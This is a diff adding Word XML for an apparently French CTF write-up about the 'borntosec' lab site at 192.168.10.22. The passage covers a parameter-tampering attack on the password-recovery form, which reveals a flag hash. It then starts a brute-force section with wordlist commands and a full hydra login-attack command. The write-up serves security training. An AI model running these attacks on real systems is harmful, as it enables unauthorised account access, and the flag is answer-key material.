+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>execute</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>([$_GET['id']]);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>$user = $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>stmt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fetch</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="double" w:sz="6" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Attaque </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>R</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>ecover_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>submit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Parameter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Tampering</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+        <w:t>1d4855f7337c0c14b6f44946872c4eb33853f40b2d54393fbe94f49f1e19bbb0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>Depuis la page de login en faisant « </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>forgot</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>my</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">» on arrive sur la page </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId45" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          </w:rPr>
+          <w:t>http://192.168.10.22/?page=recover</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3742E0CA" wp14:editId="7F41539B">
+            <wp:extent cx="2543175" cy="1584173"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="870599923" name="Image 1" descr="Une image contenant texte, capture d’écran, logo, conception&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="870599923" name="Image 1" descr="Une image contenant texte, capture d’écran, logo, conception&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId46"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2549197" cy="1587924"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>En inspectant le code source on aperçoit cette adresse mail :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>webmaster@borntosec.com</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EB319A4" wp14:editId="05BADA40">
+            <wp:extent cx="5760720" cy="916305"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="79841261" name="Image 1" descr="Une image contenant texte, Police, capture d’écran, ligne&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="79841261" name="Image 1" descr="Une image contenant texte, Police, capture d’écran, ligne&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId47"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="916305"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>En supprimant le «# »  de action et le « </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>hidden</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t> » puis en modifiant le « </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>webmaster@borntosec</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> » par </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId48" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          </w:rPr>
+          <w:t>kali12@kali.com</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> et en supprimant la longueur 15 on obtient le flag</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23756928" wp14:editId="4DEDB003">
+            <wp:extent cx="5760720" cy="2373630"/>
+            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
+            <wp:docPr id="417640101" name="Image 1" descr="Une image contenant texte, Police, capture d’écran, Graphique&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="417640101" name="Image 1" descr="Une image contenant texte, Police, capture d’écran, Graphique&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId49"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="2373630"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="double" w:sz="6" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>ttaque BRUTE FORCE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>Créeons</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> les fichiers </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>users</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> et </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>passwords</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> afin de récupérer ceux-ci :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>echo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -e "root\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>nadmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>" &gt; users.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>echo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -e "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fortytwo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>nalbatroz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>nadmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>npassword</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>" &gt; passwords.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>hydra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -L users.txt -P passwords.txt 192.168.10.22 http-post-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>form</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "/index.php?page=signin:username=^USER^&amp;password=^PASS^&amp;Login=Login:F=Wrong"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
